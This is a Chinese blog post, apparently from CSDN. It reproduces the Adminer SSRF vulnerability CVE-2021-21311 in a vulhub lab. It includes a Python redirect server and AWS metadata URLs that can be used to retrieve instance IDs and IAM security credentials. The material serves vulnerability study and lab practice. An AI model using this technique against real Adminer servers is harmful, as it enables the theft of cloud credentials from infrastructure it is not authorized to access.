vulhub中Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞复现(CVE-2021-21311)

已于 2024-02-03 13:34:57 修改
阅读量879 收藏 1
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: 数据库
于 2024-02-03 13:21:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/136007030
版权

Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。

在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。

参考连接:

https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml

1.在Adminer登录页面,选择ElasticSearch作为系统目标,并在server字段填写`example.com`,点击登录即可看到`example.com`返回的400错误页面展示在页面中

Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com)

使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。

参考链接:

首先,启动一个python服务器,该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下,重定向指向AWS元数据服务:

http://169.254.169.254/latest/meta-data/instance-id

然后,在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器,这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。

重定向请求的python脚本:

#!/usr/bin/env python

import SimpleHTTPServer
import SocketServer
import sys
import argparse

def redirect_handler_factory(url):
    """
    Returns a request handler class that redirects to supplied `url`
    """
    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
       def do_GET(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

       def do_POST(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

    return RedirectHandler


def main():

    parser = argparse.ArgumentParser(description='HTTP redirect server')

    parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
    parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
    parser.add_argument('redirect_url', action="store")

    myargs = parser.parse_args()

    redirect_url = myargs.redirect_url
    port = myargs.port
    host = myargs.ip

    redirectHandler = redirect_handler_factory(redirect_url)

    handler = SocketServer.TCPServer((host, port), redirectHandler)
    print("serving at port %s" % port)
    handler.serve_forever()

if __name__ == "__main__":
    main()
http://169.254.169.254/latest/meta-data/iam/security-credentials/  //列出服务器的可用角色。
余生有个小酒馆
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-21315漏洞复现-kali2020.4
weixin_43867542的博客
07-19 1197
漏洞名称:systeminformation 操作系统命令注入漏洞 等级危害:高危 CVSS评分:7.8 漏洞类型:操作系统命令注入 漏洞概述 systeminformation存在操作系统命令注入漏洞,该漏洞源于外部输入数据构造操作系统可执行命令过程,网络系统或产品未正确过滤其的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。 受影响版本 systeminformation < 5.3.1 环境概述 kali2020.4 漏洞复现 1.准备工作 ...
渗透测试遇到的Adminer任意文件读取漏洞
网安君的博客
01-17 5951
在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
【web渗透】SSRF漏洞超详细讲解
zz12345600354的博客
04-24 915
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当间人)探测目标端口如果目标未开放探测的端口,则会立马产生回显如果对方开放了所探测的端口,页面将会一直处于加载的状态。
vulhubAdminer远程文件读取漏洞复现CVE-2021-43008)
yougexiaojiuguan的博客
02-03 827
漏洞复现过程的记录,也是为了方便自己查看
HTB-AdmirerToo
qq_53142368的博客
07-12 1859
HTB
CVE-2021-21311复现学习
shierbai的博客
05-20 376
如图在物理机(不属于上述任何一个ip)输入要访问的主机及其端口(这里这个ip就是在环境属于内网我们无法直接访问到的那个服务器,而通过ssrf可以让我们伪造另一个服务端去发送请求来返回我们想要的数据),可以看到在139端显示这个请求是由138发出的,而不是自己的ip,这样就完成了ssrf,不过在利用上博主还不太能够善用。adminer版本是4.7.8,是php编写的数据库管理工具,存在漏洞CVE-2021-21311,它是 Adminer 版本 4.0.0 的服务器端请求伪造,到 4.7.9。
烽火狼烟丨PHP远程代码执行漏洞CVE-2022-31625、CVE-2022-31626)风险提示
C20220511的博客
06-13 2599
1、漏洞概述近日,WebRAY安全服务产品线监测到PHP 官方发布了关于PHP存在远程代码执行漏洞漏洞通告,漏洞编号分别为:CVE-2022-31625、CVE-2022-31626。
vulhub漏洞—Apache_Solr_RemoteStreaming文件读取与SSRF漏洞
weixin_45808483的博客
12-17 348
漏洞描述 Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响范围 Apache Solr <= 8.8.1 复现过程 漏洞环境 vulhub搭建:https://github.com/vulhub/vulhub/blob/master/solr/Remote-Streaming-Fileread/README.zh-cn.md 执行如下命令启动solr 8.8.1:
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞CVE-2016-5734)
黑白的博客
12-29 577
声明 好好学习,天天向上 漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能,将用户输入的信息拼接进preg_replace函数第一个参数。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 影响范围 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要
adminer-custom:Adminer的定制,这是用PHP编写的最佳数据库管理工具
02-03
自动登录如果要自动登录(仅用于非公共环境,例如localhost),可以通过设置环境变量ADMINER_SERVERADMINER_USERNAME和ADMINER_PASSWORD 。 如果要自动重定向到https,请将ADMINER_HTTPS_REDIRECT环境变量设置为...
adminer-docker-dracula:具有dracula主题的Docker管理员映像
04-05
带有和,等待 如何使用它 在终端: make up SQL脚本生成一些表 CREATE TABLE "table_00" ( "id" integer NOT NULL ); CREATE TABLE "table_01" ( "id" integer NOT NULL ); CREATE TABLE "table_02" ( "id" integer...
adminer-shortcuts:一个插件,用于按名称过滤Adminer 4
05-01
运行sudo apt install miredo和sudo service miredo force-start 。 该存储库是一个镜像。 当前版本:1.5.0(04/04/2021) 兼容性:管理员4.3 / 4.4 / 4.5 / 4.6 / 4.7 / 4.8-...
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意件读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
【MySQL精通之路】SQL优化(1)-查询优化(1)-WHERE子句
Anakki的博客
05-22 644
与PRIMARY KEY或UNIQUE索引上的WHERE子句一起使用的表,其所有索引部分都与常量表达式进行比较,并定义为NOT NULL。由于MySQL会自动进行类似的优化,因此您通常可以避免这项工作,并将查询保留为更易于理解和维护的形式。因为MySQL优化器的开发工作还在进行,所以这里并没有记录MySQL优化器所有的优化。您可能会试图重写查询以加快算术运算,同时牺牲可读性。,这有助于简化join连接。有关更多信息和示例,请参见“有关更多信息,请参见“空表或只有一行的表。
Linux文件操作——实现cp指令以及模拟修改配置文件
最新发布
shion1114的博客
05-23 343
cp 1.c 2.c功能是将(内容相同,实现拷贝)main函数的参数由编译结果可知,总共有三个输入参数,同时输出每个参数字符串内容。
《Python编程从入门到实践》day36
m0_37565294的博客
05-22 1772
我们要编写一个名为“学习笔记”的Web应用程序,让用户能够记录感兴趣的主题,并在学习每个主题的过程添加日志条目。django-admin startproject learning_log . # 新建一个名为learning_log的项目,末尾的句点让新项目使用合适的目录结构。运行命令ls,其输出表明Django有创建一个db.sqlite3.SQLite使用一种使用单个文件的数据库。# 包含4个文件(settings.py、urls.py、wsgi.py、__init__.py)
CVE-2022-31625
09-02
CVE-2022-31625是PHP的一个远程代码执行漏洞。这个漏洞是由于PHP_FUNCTION分配在堆上的数组清除不及时导致的。攻击者可以通过错误地再次调用php_pgsql_free_params()函数,并使用之前未及时清除的数组值,从而实现远程代码执行。这个漏洞可能影响基于PHP的数据库管理软件,例如Adminer和PHPmyAdmin。为了防止此漏洞的利用,建议及时升级到修复了该漏洞的PHP版本。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [烽火狼烟丨PHP远程代码执行漏洞CVE-2022-31625、CVE-2022-31626)风险提示](https://blog.csdn.net/C20220511/article/details/125258528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [【安全要闻】PHP多个远程代码执行漏洞风险预警](https://blog.csdn.net/qzt961003/article/details/125317187)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值